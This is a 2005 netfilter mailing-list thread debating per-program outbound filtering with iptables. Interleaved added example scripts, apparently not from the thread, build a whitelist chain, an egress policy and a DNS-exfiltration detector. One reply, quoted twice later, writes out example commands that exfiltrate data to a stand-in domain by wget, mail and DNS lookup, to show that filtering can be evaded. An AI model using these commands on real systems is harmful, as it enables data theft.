* Nice ZoneAlarm that might be useful for Iptables
@ 2005-05-31  3:53 Larry Alkoff
  2005-05-31  4:33 ` Frank Gruellich
                   ` (2 more replies)
  0 siblings, 3 replies; 15+ messages in thread
From: Larry Alkoff @ 2005-05-31  3:53 UTC (permalink / raw)
  To: Netfilter

There is a nice feature of Zonealarm for Windows that will check 
outgoing packets, and if that program sending is not on their list, ask 
if you want to allow that program to access the web.

In addition, it will warn if a program is asking for server rights 
and ask for approval to grant that, although I don't understand 
what they mean by "server rights".

Most Iptables scripts I've seen do very little OUTPUT filtering which 
means a malicious program, if it got access somehow, could have free 
range to send packets out.  Zombie or spyware perhaps.

The ability to block this by only allowing "approved" programs to access 
the Internet would be a nice addition to Iptables.

I heard this could be done in userspace with the QUEUE target in 
iptables although I haven't been able to dig up much information about 
QUEUE and its use.

Does anyone have some ideas on how to implement this?

If I had some ideas I'd be willing to take a first cut at it.  I know 
just enough Iptables to be dangerous <g>.

Larry

-- 
Larry Alkoff N2LA - Austin TX
Using Thunderbird on Slackware Linux



* Re: Nice ZoneAlarm that might be useful for Iptables
  2005-05-31  3:53 Nice ZoneAlarm that might be useful for Iptables Larry Alkoff
@ 2005-05-31  4:33 ` Frank Gruellich
  2005-05-31 18:18   ` R. DuFresne
  2005-06-19 21:41   ` Nick Drage
  2005-05-31  5:07 ` Taylor, Grant
  2005-05-31  6:33 ` Eric Leblond
  2 siblings, 2 replies; 15+ messages in thread
From: Frank Gruellich @ 2005-05-31  4:33 UTC (permalink / raw)
  To: netfilter

Hi,

* Larry Alkoff <labradley@mindspring.com> 30. May 05:
> [Zonealarm]
> In addition, it will warn if a program is asking for server rights 
> and ask for approval to grant that, although I don't understand 
> what they mean by "server rights".

AFAIK in Zonealarm it means that a program starts a server: it listens on
a port.  For Unix it needs root privileges to listen on ports below 1024
(dunno about Windows).

> Most Iptables scripts I've seen do very little OUTPUT filtering which 
> means a malicious program, if it got access somehow, could have free 
> range to send packets out.  Zombie or spyware perhaps.

While OUTPUT has nothing to do with servers, it is simply impossible.
You can't protect an infected host.

> The ability to block this by only allowing "approved" programs to access 
> the Internet would be a nice addition to Iptables.

Define "access the Internet".  There will be some hundreds of ways for
malware to send data you can't even catch with iptables.  There are some
more dozens of ways you can't block at all.  How do you intend to catch

 $ wget 'http://www.hackers.com/script.php?info=this%20is%20my%20very%20secret%20information'
 $ echo "this is the very secret information" |mail -s "$USER@`hostname -f`" jr@hackers.com
 $ ping -c1 www.this.is.my.very.secret.information.hackers.com

and many other things?  Don't install software you don't trust.  Sorry,
but this is AFAICS the only way.

Kind regards,
 Frank.
-- 
Sigmentation fault



* Re: Nice ZoneAlarm that might be useful for Iptables
  2005-05-31  3:53 Nice ZoneAlarm that might be useful for Iptables Larry Alkoff
  2005-05-31  4:33 ` Frank Gruellich
@ 2005-05-31  5:07 ` Taylor, Grant
  2005-05-31  6:42   ` Feizhou
  2005-05-31  6:33 ` Eric Leblond
  2 siblings, 1 reply; 15+ messages in thread
From: Taylor, Grant @ 2005-05-31  5:07 UTC (permalink / raw)
  To: Netfilter

Larry Alkoff wrote:
> There is a nice feature of Zonealarm for Windows that will check 
> outgoing packets, and if that program sending is not on their list, ask 
> if you want to allow that program to access the web.
> 
> In addition, it will warn if a program is asking for server rights 
> and ask for approval to grant that, although I don't understand 
> what they mean by "server rights".
> 
> Most Iptables scripts I've seen do very little OUTPUT filtering which 
> means a malicious program, if it got access somehow, could have free 
> range to send packets out.  Zombie or spyware perhaps.
> 
> The ability to block this by only allowing "approved" programs to access 
> the Internet would be a nice addition to Iptables.

The ability to only allow "approved" programs to send traffic out *IS* available now.  You are asking for something that the "owner" match extension will provide via the "--cmd-owner", possibly in combination with the "--uid-owner".

> I heard this could be done in userspace with the QUEUE target in 
> iptables although I haven't been able to dig up much information about 
> QUEUE and its use.
> 
> Does anyone have some ideas on how to implement this?

If I did I would have stated so in my original post about the QUEUE target.  Sorry.  :(

> If I had some ideas I'd be willing to take a first cut at it.  I know 
> just enough Iptables to be dangerous <g>.

I'll give you warning about this type of firewall setup.  If you are wanting to run this on a firewall that has multiple people behind it, as in a firewall that NATs for a LAN, you will not be able to run the owner match support as the owner of the traffic will not even be on the box that is running this firewall.  To be able to use anything like what you are stating ZoneAlarm will do you will have to run it on the machine(s) that is (are) generating the original traffic in the filter table OUTPUT queue.  Bearing this in mind I do think that it would be possible to set up rules in the filter table OUTPUT chain like the following to prevent anyone but the apache user and the apache command from sending out traffic from port 80:

iptables -t filter -A OUTPUT -o ${INet} -p tcp --sport 80 -m owner ! --uid-owner ${Apache_user} ! --gid-owner ${Apache_group} --cmd-owner httpd -j DROP

Below is a similar rule for sendmail:

iptables -t filter -A OUTPUT -o ${INet} -p tcp --sport 25 -m owner ! --uid-owner ${Sendmail} ! --gid-owner ${Sendmail} --cmd-owner sendmail -j DROP

One *MAJOR* problem that I have with this solution for you is that it is *VERY* static and probably is not flexible enough for an end user system.  However I do think that such rules could be used with the assistance of a user space daemon managing rules like these in their own chain.  Such a setup would be as follows:

iptables -t filter -N IPTablesAlarm
iptables -t filter -A IPTablesAlarm -o ${INet} -p tcp --sport 80 -m owner ! --uid-owner ${Apache_user} ! --gid-owner ${Apache_group} --cmd-owner httpd -j DROP
iptables -t filter -A IPTablesAlarm -o ${INet} -p tcp --sport 25 -m owner ! --uid-owner ${Sendmail} ! --gid-owner ${Sendmail} --cmd-owner sendmail -j DROP
#< other rules (dynamically created) here >

I think I would evolve this chain a bit further though.  I would personally do something more along the lines of this on my home system(s):

iptables -t filter -N IPTablesAlarm
iptables -t filter -A IPTablesAlarm -o ${INet} -p tcp --sport 80 -m owner --uid-owner ${Apache_user} --gid-owner ${Apache_group} --cmd-owner httpd -j RETURN
iptables -t filter -A IPTablesAlarm -o ${INet} -p tcp --sport 25 -m owner --uid-owner ${Sendmail} --gid-owner ${Sendmail} --cmd-owner sendmail -j RETURN
#< other rules (dynamically created) here >
iptables -t filter -A IPTablesAlarm -j LOG --log-prefix "IPTablesAlarm:  "
iptables -t filter -A IPTablesAlarm -j DROP

This would facilitate ensuring that only the appropriate programs run by the appropriate users can send traffic out any given port and that anything else will get LOGed and DROPed.

Any way that you go about anything like this you *WILL* *NEED* some sort of user space program / daemon managing the firewall chain if you do choose to do this in IPTables.  If you do choose to do this in user space via the QUEUE target you will need a daemon to handle that QUEUE as well as something to administer the dynamic rules that it uses.  Either way you go about it you are looking at some sort of daemon and user interface.  As stated before I am not qualified to help with the user space QUEUE target in any way, shape or form.



Grant. . . .
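The chain Grant sketches above, written out as a script that generates it from a whitelist. This is an added example, not Grant's own script or anything from the netfilter project: the whitelist entries, the interface name `eth0` and the user/group names are constructed, and `IPT` defaults to `echo` so the script can be dry-run without root or iptables installed (set `IPT=iptables` to apply it). One caveat a practitioner should know: the `--cmd-owner` option used here was dropped from the kernel's owner match in 2.6.14, so on current kernels only `--uid-owner` and `--gid-owner` remain and a program can only be pinned down by running it under a dedicated uid.

```shell
#!/bin/sh
# Added example, not Grant's own script: builds the IPTablesAlarm chain he
# sketches from a whitelist of "port user group command" entries.
# IPT defaults to "echo" so this dry-runs without root or iptables installed;
# run with IPT=iptables to apply. INET is the Internet-facing interface
# (assumed name), and the whitelist entries are constructed values.
IPT="${IPT:-echo}"
INET="${INET:-eth0}"
CHAIN="IPTablesAlarm"

# Constructed whitelist, one tuple per line:
# <tcp source port> <owner user> <owner group> <command name>
WHITELIST="80 apache apache httpd
25 mail mail sendmail"

# Emit the chain: each whitelisted tuple RETURNs (is allowed through), and
# anything else leaving $INET is logged with a prefix, then dropped.
build_alarm_chain() {
    $IPT -t filter -N "$CHAIN"
    printf '%s\n' "$WHITELIST" | while read -r port user group cmd; do
        [ -n "$port" ] || continue
        $IPT -t filter -A "$CHAIN" -o "$INET" -p tcp --sport "$port" \
            -m owner --uid-owner "$user" --gid-owner "$group" \
            --cmd-owner "$cmd" -j RETURN
    done
    $IPT -t filter -A "$CHAIN" -j LOG --log-prefix "$CHAIN: "
    $IPT -t filter -A "$CHAIN" -j DROP
    # Hook the chain into OUTPUT so locally generated traffic traverses it.
    $IPT -t filter -A OUTPUT -o "$INET" -j "$CHAIN"
}

# Number of rules appended to the alarm chain itself (whitelist + LOG + DROP);
# handy for checking the generated rule set before applying it.
count_chain_rules() {
    build_alarm_chain | grep -c -- "-A $CHAIN "
}

build_alarm_chain
```

Because the chain ends in an unconditional DROP, every legitimate client on the host (a browser, an SSH client, the resolver) needs its own whitelist entry, which is exactly the "very static" problem Grant raises and the reason he expects a daemon to manage the dynamic rules.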



* Re: Nice ZoneAlarm that might be useful for Iptables
  2005-05-31  3:53 Nice ZoneAlarm that might be useful for Iptables Larry Alkoff
  2005-05-31  4:33 ` Frank Gruellich
  2005-05-31  5:07 ` Taylor, Grant
@ 2005-05-31  6:33 ` Eric Leblond
  2005-06-19 21:35   ` Nick Drage
  2 siblings, 1 reply; 15+ messages in thread
From: Eric Leblond @ 2005-05-31  6:33 UTC (permalink / raw)
  To: netfilter

> There is a nice feature of Zonealarm for Windows that will check
> outgoing packets, and if that program sending is not on their list, ask
> if you want to allow that program to access the web.

Maybe you can have a look at:
http://fireflier.sourceforge.net/
I've never tested it but from screenshots it seems able to do application
filtering:
http://fireflier.sourceforge.net/qtclient_userspace.html

By the way you can have network range application filtering with nufw :
http://www.nufw.org

>
> In addition, it will warn if a program is asking for server rights
> and ask for approval to grant that, although I don't understand
> what they mean by "server rights".

This is the right to open a socket in listening mode?

>
> Most Iptables scripts I've seen do very little OUTPUT filtering which
> means a malicious program, if it got access somehow, could have free
> range to send packets out.  Zombie or spyware perhaps.
>
> The ability to block this by only allowing "approved" programs to access
> the Internet would be a nice addition to Iptables.
>
> I heard this could be done in userspace with the QUEUE target in
> iptables although I haven't been able to dig up much information about
> QUEUE and its use.
>
> Does anyone have some ideas on how to implement this?
>
> If I had some ideas I'd be willing to take a first cut at it.  I know
> just enough Iptables to be dangerous <g>.
>
> Larry
>
> --
> Larry Alkoff N2LA - Austin TX
> Using Thunderbird on Slackware Linux
>
>





* Re: Nice ZoneAlarm that might be useful for Iptables
  2005-05-31  5:07 ` Taylor, Grant
@ 2005-05-31  6:42   ` Feizhou
  2005-05-31  6:44     ` Taylor, Grant
  0 siblings, 1 reply; 15+ messages in thread
From: Feizhou @ 2005-05-31  6:42 UTC (permalink / raw)
  To: Netfilter


>> The ability to block this by only allowing "approved" programs to 
>> access the Internet would be a nice addition to Iptables.
> 
> 
> The ability to only allow "approved" programs to send traffic out *IS* 
> available now.  You are asking for something that the "owner" 
> match extension will provide via the "--cmd-owner", possibly in 
> combination with the "--uid-owner".

Nope.  Owner match is not going to do the 'approved' program access check.

Zone Alarm triggers on the name of the program.

For something similar, there needs to be a way for iptables to store and 
reference a list of approved process names (not necessarily their access 
patterns such as dest port and so on, but I suppose if the name list is 
possible, it won't be that hard to tack on extra optional conditions), 
and so a trojan running wget would trigger if wget was not in the list 
of approved programs.



* Re: Nice ZoneAlarm that might be useful for Iptables
  2005-05-31  6:42   ` Feizhou
@ 2005-05-31  6:44     ` Taylor, Grant
  0 siblings, 0 replies; 15+ messages in thread
From: Taylor, Grant @ 2005-05-31  6:44 UTC (permalink / raw)
  To: Netfilter

> For something similar, there needs to be a way for iptables to store and 
> reference a list of approved process names (not necessarily their access 
> patterns such as dest port and so on but i suppose if the name list is 
> possible, it won't be that hard to tack on extra optional conditions) 
> and so a trojan running wget would trigger if wget was not in the list 
> of approved programs.

*nod*

Owner match extension does not have a way to know what process / user / group / command initiated the wget command.  But owner match extension could be used to make sure that only Apache (or what ever web server you are running) will send packets out from port 80, etc.



Grant. . . .



* Re: Nice ZoneAlarm that might be useful for Iptables
  2005-05-31  4:33 ` Frank Gruellich
@ 2005-05-31 18:18   ` R. DuFresne
  2005-06-01  2:12     ` Feizhou
  2005-06-19 21:41   ` Nick Drage
  1 sibling, 1 reply; 15+ messages in thread
From: R. DuFresne @ 2005-05-31 18:18 UTC (permalink / raw)
  To: Frank Gruellich; +Cc: netfilter


Zone alarm tends to run on single user systems, and is geared well for 
that kind of access.  Imagine trying to allow 1500 users the ability to 
control your fw rules to do something similar in a production multi-user 
env, from various systems forwarding through the fw in both directions.

How many gatekeepers would it take to keep an eye on this kind of setup?
And how well trusted are your average users?


Perhaps on a standalone linux desktop this might be feasible, but, 
certainly not in a real working env.

Thanks,

Ron DuFresne

On Tue, 31 May 2005, Frank Gruellich wrote:

> Hi,
>
> * Larry Alkoff <labradley@mindspring.com> 30. May 05:
>> [Zonealarm]
>> In addition, it will warn if a program is asking for server rights
>> and ask for approval to grant that, although I don't understand
>> what they mean by "server rights".
>
> AFAIK in Zonealarm it means that a program starts a server: it listens on
> a port.  For Unix it needs root privileges to listen on ports below 1024
> (dunno about Windows).
>
>> Most Iptables scripts I've seen do very little OUTPUT filtering which
>> means a malicious program, if it got access somehow, could have free
>> range to send packets out.  Zombie or spyware perhaps.
>
> While OUTPUT has nothing to do with servers, it is simply impossible.
> You can't protect an infected host.
>
>> The ability to block this by only allowing "approved" programs to access
>> the Internet would be a nice addition to Iptables.
>
> Define "access the Internet".  There will be some hundreds of ways for
> malware to send data you can't even catch with iptables.  There are some
> more dozens of ways you can't block at all.  How do you intend to catch
>
> $ wget 'http://www.hackers.com/script.php?info=this%20is%20my%20very%20secret%20information'
> $ echo "this is the very secret information" |mail -s "$USER@`hostname -f`" jr@hackers.com
> $ ping -c1 www.this.is.my.very.secret.information.hackers.com
>
> and many other things?  Don't install software you don't trust.  Sorry,
> but this is AFAICS the only way.
>
> Kind regards,
> Frank.
> --
> Sigmentation fault
>

- -- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         admin & senior security consultant:  sysinfo.com
                         http://sysinfo.com
Key fingerprint = 9401 4B13 B918 164C 647A  E838 B2DF AFCC 94B0 6629

...We waste time looking for the perfect lover
instead of creating the perfect love.

                 -Tom Robbins <Still Life With Woodpecker>



* Re: Nice ZoneAlarm that might be useful for Iptables
  2005-05-31 18:18   ` R. DuFresne
@ 2005-06-01  2:12     ` Feizhou
  2005-06-01  2:16       ` Jason Opperisano
  0 siblings, 1 reply; 15+ messages in thread
From: Feizhou @ 2005-06-01  2:12 UTC (permalink / raw)
  To: Netfilter

R. DuFresne wrote:
> Zone alarm tends to run on single user systems, and is geared well for 
> that kind of access.  Imagine trying to allow 1500 users the ability to 
> control your fw rules to do something similar in a production 
> multi-user env, from various systems forwarding through the fw in both 
> directions.
> 
> How many gatekeepers would it take to keep an eye on this kind of setup?
> And how well trusted are your average users?
> 
> 
> Perhaps on a standalone linux desktop this might be feasible, but, 
> certainly not in a real working env.

I disagree. We do not have to provide a Zone Alarm clone. Its 
functionality of checking what processes can use the network though 
would be useful in providing mandatory controls on what processes get to 
talk to the outside world.

Right now there is simply no such ability. Having this on, say, a server 
will prevent users from looking around the network if they have shell 
access or sending info/data out. Obviously only root should be able to 
see the list of process names allowed and the other conditions like uid 
and ports the process is allowed to use.



* Re: Nice ZoneAlarm that might be useful for Iptables
  2005-06-01  2:12     ` Feizhou
@ 2005-06-01  2:16       ` Jason Opperisano
  2005-06-01  2:37         ` Feizhou
  0 siblings, 1 reply; 15+ messages in thread
From: Jason Opperisano @ 2005-06-01  2:16 UTC (permalink / raw)
  To: netfilter

On Wed, Jun 01, 2005 at 10:12:36AM +0800, Feizhou wrote:
> I disagree. We do not have to provide a Zone Alarm clone. Its 
> functionality of checking what processes can use the network though 
> would be useful in providing mandatory controls on what processes get to 
> talk to the outside world.
> 
> Right now there is simply no such ability. Having this on say a server 
> will prevent users from looking around the network if they have shell 
> access or sending info/data out. Obviously only root should be able to 
> see the list of process names allowed and the other conditions like uid 
> and ports allowed to use by the process.

http://www.nsa.gov/selinux/

the mere act of saying something on a public mailing list doesn't make
it true.

-j

--
"Lois: What's going on?
 Stewie: We're playing house.
 Lois: The boy is all tied up.
 Stewie: Roman Polanski's house."
        --Family Guy



* Re: Nice ZoneAlarm that might be useful for Iptables
  2005-06-01  2:16       ` Jason Opperisano
@ 2005-06-01  2:37         ` Feizhou
  0 siblings, 0 replies; 15+ messages in thread
From: Feizhou @ 2005-06-01  2:37 UTC (permalink / raw)
  To: Netfilter

Jason Opperisano wrote:
> On Wed, Jun 01, 2005 at 10:12:36AM +0800, Feizhou wrote:
> 
>>I disagree. We do not have to provide a Zone Alarm clone. Its 
>>functionality of checking what processes can use the network though 
>>would be useful in providing mandatory controls on what processes get to 
>>talk to the outside world.
>>
>>Right now there is simply no such ability. Having this on say a server 
>>will prevent users from looking around the network if they have shell 
>>access or sending info/data out. Obviously only root should be able to 
>>see the list of process names allowed and the other conditions like uid 
>>and ports allowed to use by the process.
> 
> 
> http://www.nsa.gov/selinux/
> 
> the mere act of saying something on a public mailing list doesn't make
> it true.
> 

:)

I stand corrected.



* Re: Nice ZoneAlarm that might be useful for Iptables
  2005-05-31  6:33 ` Eric Leblond
@ 2005-06-19 21:35   ` Nick Drage
  0 siblings, 0 replies; 15+ messages in thread
From: Nick Drage @ 2005-06-19 21:35 UTC (permalink / raw)
  To: netfilter

On Tue, May 31, 2005 at 08:33:44AM +0200, Eric Leblond wrote:

> > In addition, it will warn if a program is asking for server rights
> > and ask for approval to grant that, although I don't understand
> > what they mean by "server rights".
> 
> This is the right to open a socket in listening mode ?

Yes it is in ZoneAlarm terms... if you'll excuse the rather late answer.

-- 
If at first you don't succeed, destroy all the evidence that you tried.



* Re: Nice ZoneAlarm that might be useful for Iptables
  2005-05-31  4:33 ` Frank Gruellich
  2005-05-31 18:18   ` R. DuFresne
@ 2005-06-19 21:41   ` Nick Drage
  2005-06-19 21:49     ` Jan Engelhardt
  2005-06-20  5:28     ` Frank Gruellich
  1 sibling, 2 replies; 15+ messages in thread
From: Nick Drage @ 2005-06-19 21:41 UTC (permalink / raw)
  To: netfilter

On Tue, May 31, 2005 at 06:33:10AM +0200, Frank Gruellich wrote:

> * Larry Alkoff <labradley@mindspring.com> 30. May 05:
> > [Zonealarm]
> > In addition, it will warn if a program is asking for server rights 
> > and ask for approval to grant that, although I don't understand 
> > what they mean by "server rights".
> 
> AFAIK in Zonealarm it means that a program starts a server: it listens on
> a port.  For Unix it needs root privileges to listen on ports below 1024
> (dunno about Windows).

AFAICT any program or user can open a socket on any port if it's not
already in use.

> > Most Iptables scripts I've seen do very little OUTPUT filtering
> > which means a malicious program, if it got access somehow, could
> > have free range to send packets out.  Zombie or spyware perhaps.
> 
> While OUTPUT has nothing to do with servers, it is simply impossible.
> You can't protect an infected host.

Of course you can.

If the firewall is on the local machine you could configure that
firewall to restrict inbound and outbound traffic.  If the malware
doesn't have root, or doesn't have the ability to turn off firewalling,
then it can't do anything on the network, or can't be reached from the
network.

If the firewall is on a gateway with a pretty hardcore egress filter,
say nothing direct allowed out, all web traffic goes through a proxy
and all email goes through the local server, then again its a lot harder
for that malware to do anything if its payload involves Internet
connectivity.

> > The ability to block this by only allowing "approved" programs to access 
> > the Internet would be a nice addition to Iptables.
> 
> Define "access the Internet".  There will be some hundreds of ways for
> malware to send data you can't even catch with iptables.  There are some
> more dozens of ways you can't block at all.  How do you intend to catch
> 
>  $ wget 'http://www.hackers.com/script.php?info=this%20is%20my%20very%20secret%20information'

Use a proxy?

>  $ echo "this is the very secret information" |mail -s "$USER@`hostname -f`" jr@hackers.com

A mail server or Network IDS set to pick up on the terms used in such
secret information.

>  $ ping -c1 www.this.is.my.very.secret.information.hackers.com

Stop ICMP ping outbound?  Why would that be needed by normal users?

You can't completely block malware from accessing the Internet, but you
can make it really, really difficult...

-- 
If at first you don't succeed, destroy all the evidence that you tried.
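The gateway egress filter Nick describes ("nothing direct allowed out, all web traffic goes through a proxy and all email goes through the local server"), written out as FORWARD rules. This is an added example and not code from the thread: the interface name, the proxy, relay and resolver addresses are constructed, the three servers are assumed to sit on a segment routed through this gateway so their traffic actually traverses FORWARD, and `IPT` defaults to `echo` for a dry run. It goes one step past Nick's list by also pinning DNS to the internal resolver, since a workstation that can query outside DNS servers directly still has a channel out.

```shell
#!/bin/sh
# Added example, not code from the thread: the "nothing direct allowed out"
# egress policy expressed as FORWARD rules on a gateway. Only the web proxy,
# the mail relay and the internal resolver may open connections outward;
# every other forwarded packet leaving $INET is logged and dropped.
# Interface name and addresses are assumed/constructed; IPT defaults to
# "echo" so this dry-runs without root (IPT=iptables applies it).
IPT="${IPT:-echo}"
INET="${INET:-eth0}"                  # Internet-facing interface (assumed)
PROXY="${PROXY:-192.168.10.2}"        # constructed: web proxy host
RELAY="${RELAY:-192.168.10.3}"        # constructed: outbound mail relay
RESOLVER="${RESOLVER:-192.168.10.1}"  # constructed: internal DNS resolver

egress_policy() {
    # Replies to connections already permitted may always leave.
    $IPT -A FORWARD -o "$INET" -m state --state ESTABLISHED,RELATED -j ACCEPT
    # Web: only the proxy may open HTTP/HTTPS connections outward.
    $IPT -A FORWARD -o "$INET" -s "$PROXY" -p tcp -m multiport --dports 80,443 -j ACCEPT
    # Mail: only the relay may open SMTP connections outward.
    $IPT -A FORWARD -o "$INET" -s "$RELAY" -p tcp --dport 25 -j ACCEPT
    # DNS: only the internal resolver may query outside servers, so every
    # lookup from a workstation passes through (and can be logged by) it.
    $IPT -A FORWARD -o "$INET" -s "$RESOLVER" -p udp --dport 53 -j ACCEPT
    $IPT -A FORWARD -o "$INET" -s "$RESOLVER" -p tcp --dport 53 -j ACCEPT
    # Everything else (including ICMP and direct client connections) is
    # logged at a limited rate and dropped; those log lines are where a
    # workstation trying to talk to the Internet directly shows up.
    $IPT -A FORWARD -o "$INET" -m limit --limit 5/min -j LOG --log-prefix "EGRESS-DENY: "
    $IPT -A FORWARD -o "$INET" -j DROP
}

# Helper for checking the generated policy: number of ACCEPT rules emitted.
count_accepts() { egress_policy | grep -c -- '-j ACCEPT'; }

egress_policy
```

Run as root with `IPT=iptables`; with the default `echo` it only prints the rules so they can be reviewed first. The `-m state` match is the form in use at the time of the thread; on current kernels `-m conntrack --ctstate` is the equivalent.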



* Re: Nice ZoneAlarm that might be useful for Iptables
  2005-06-19 21:41   ` Nick Drage
@ 2005-06-19 21:49     ` Jan Engelhardt
  2005-06-20  5:28     ` Frank Gruellich
  1 sibling, 0 replies; 15+ messages in thread
From: Jan Engelhardt @ 2005-06-19 21:49 UTC (permalink / raw)
  To: Nick Drage; +Cc: netfilter


>AFAICT any program or user can open a socket on any port if it's not
>already in use.

Unless someone uses a security framework.



Jan Engelhardt                                                               
--                                                                            
| Gesellschaft fuer Wissenschaftliche Datenverarbeitung Goettingen,
| Am Fassberg, 37077 Goettingen, www.gwdg.de



* Re: Nice ZoneAlarm that might be useful for Iptables
  2005-06-19 21:41   ` Nick Drage
  2005-06-19 21:49     ` Jan Engelhardt
@ 2005-06-20  5:28     ` Frank Gruellich
  2005-06-20  6:47       ` David Busby
  1 sibling, 1 reply; 15+ messages in thread
From: Frank Gruellich @ 2005-06-20  5:28 UTC (permalink / raw)
  To: netfilter; +Cc: Nick Drage

* Nick Drage <nickd@metastasis.org.uk> 19. Jun 05:
> On Tue, May 31, 2005 at 06:33:10AM +0200, Frank Gruellich wrote:
> > AFAIK in Zonealarm it means that a program starts a server: it listens on
> > a port.  For Unix it needs root privileges to listen on ports below 1024
> > (dunno about Windows).
> AFAICT any program or user can open a socket on any port if it's not
> already in use.

You're talking about Windows, aren't you?

> > While OUTPUT has nothing to do with servers, it is simply impossible.
> > You can't protect an infected host.
> Of course you can.
> 
> If the malware doesn't have root, [snip].

The important thing I implied.  I wouldn't call it infection if it
doesn't run as root.  Then it's just ... broken, messy.

> > How do you intend to catch
> >  $ wget 'http://www.hackers.com/script.php?info=this%20is%20my%20very%20secret%20information'
> Use a proxy?

We were talking about local actions, weren't we?  A local proxy?  Much
effort, isn't it?  You have to use a transparent one, you know?  Who
decides, that script.php at hackers.com is going to be filtered?

> >  $ echo "this is the very secret information" |mail -s "$USER@`hostname -f`" jr@hackers.com
> A mail server or Network IDS set to pick up on the terms used in such
> secret information.

A local IDS?  Wow!  This doesn't sound like a single host system.

> >  $ ping -c1 www.this.is.my.very.secret.information.hackers.com
> Stop ICMP ping outbound?  Why would that be needed by normal users?

The penetration is not the ICMP but the DNS resolve.  hackers.com is a
bad guy's domain running some "special" kind of DNS server.  I've seen
shells running this way.

> You can't completely block malware from accessing the Internet, but you
> can make it really, really difficult...

No, it's IMHO not that difficult.

Kind
 regards, Frank.
-- 
Sigmentation fault
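Frank's point above is that the channel in the `ping` example is the DNS lookup, not the ICMP: the data travels in the name being resolved, and blocking ICMP does nothing about it. The defender's counterpart is to watch the resolver's query log for names that carry a payload. The following is an added example, not from the thread: it runs a simple check over constructed BIND-style query log lines (the log format, the thresholds and the client addresses are all assumptions) and flags names with an unusual number of labels or an unusual length, which is what both a `this.is.my.very.secret.information` style name and a hex-encoded label look like.

```shell
#!/bin/sh
# Added example, not from the thread: flag DNS queries whose name looks like
# it carries data. Runs over constructed resolver log lines in BIND "query"
# log style (assumed format); thresholds and addresses are assumptions.
LOG='client 192.168.1.20#40123: query: www.example.org IN A +
client 192.168.1.20#40124: query: mail.example.org IN MX +
client 192.168.1.21#5353: query: www.this.is.my.very.secret.information.hackers.com IN A +
client 192.168.1.21#5354: query: 746869732069732074686520766572792073656372657420696e666f.hackers.com IN TXT +'

MAX_LABELS="${MAX_LABELS:-5}"   # assumed threshold: labels per name
MAX_LEN="${MAX_LEN:-48}"        # assumed threshold: characters per name

# Print "<client> <qname> <reason>" for every query whose name has more
# labels than MAX_LABELS or more characters than MAX_LEN.
suspicious_queries() {
    printf '%s\n' "$LOG" | awk -v maxl="$MAX_LABELS" -v maxc="$MAX_LEN" '
        /query:/ {
            client = $2
            sub(/#.*/, "", client)            # strip "#port:" from the client
            name = ""
            for (i = 1; i < NF; i++) if ($i == "query:") name = $(i + 1)
            labels = split(name, parts, ".")
            if (labels > maxl)
                print client, name, "labels=" labels
            else if (length(name) > maxc)
                print client, name, "len=" length(name)
        }'
}

# Number of flagged queries, for use in a check or a cron report.
count_suspicious() { suspicious_queries | wc -l | tr -d ' '; }

suspicious_queries
```

Two of the four constructed lines are flagged, both from the same client; in practice the thresholds need tuning against a site's normal traffic (CDN and anti-spam names are often long), and the check only helps if workstations are forced through a resolver that logs, which is why egress filtering and query logging belong together.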



* Re: Nice ZoneAlarm that might be useful for Iptables
  2005-06-20  5:28     ` Frank Gruellich
@ 2005-06-20  6:47       ` David Busby
  0 siblings, 0 replies; 15+ messages in thread
From: David Busby @ 2005-06-20  6:47 UTC (permalink / raw)
  To: netfilter

Frank Gruellich wrote:
> 
> The penetration is not the ICMP but the DNS resolve.  hackers.com is a
> bad guy's domain running some "special" kind of DNS server.  I've seen
> shells running this way.
> 
> 
>>You can't completely block malware from accessing the Internet, but you
>>can make it really, really difficult...
> 
> 
> No, it's IMHO not that difficult.
> 
> Kind
>  regards, Frank.

Didn't MS Windows just change (xp/sp2) so that infected machines can't open more than like 10 half-open sockets?  That 
was viewed as solving the wrong problem, i.e. we wouldn't have to block outbound traffic in drastic/major ways if 
infection didn't happen in the first place.  Not that that is possible either, but weigh the fix against the problem carefully.

Out of curiosity Frank, are you blocking malicious IM type softwares/plugins/add-ons or users?  If so how?

/djb


